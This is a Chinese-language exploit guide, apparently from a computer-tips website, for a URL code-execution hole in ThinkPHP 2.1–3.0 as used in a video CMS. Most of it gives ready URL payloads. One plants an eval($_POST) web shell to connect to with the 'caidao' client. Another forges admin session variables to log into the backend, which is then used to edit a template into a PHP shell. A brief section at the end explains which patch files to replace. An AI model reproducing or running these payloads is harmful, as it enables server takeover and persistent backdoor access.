第一个方法 直接执行
/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。
第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,涛涛电脑知识网,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html
index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html
index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html
执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top
index.php?s=Admin-Index-Top
s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default
拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。
修复方案:该URL安全漏洞会造成用户在客户端伪造URL,www.xuhantao.com,执行非法代码。
影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
下载地址:
修正方法:
首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件
3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件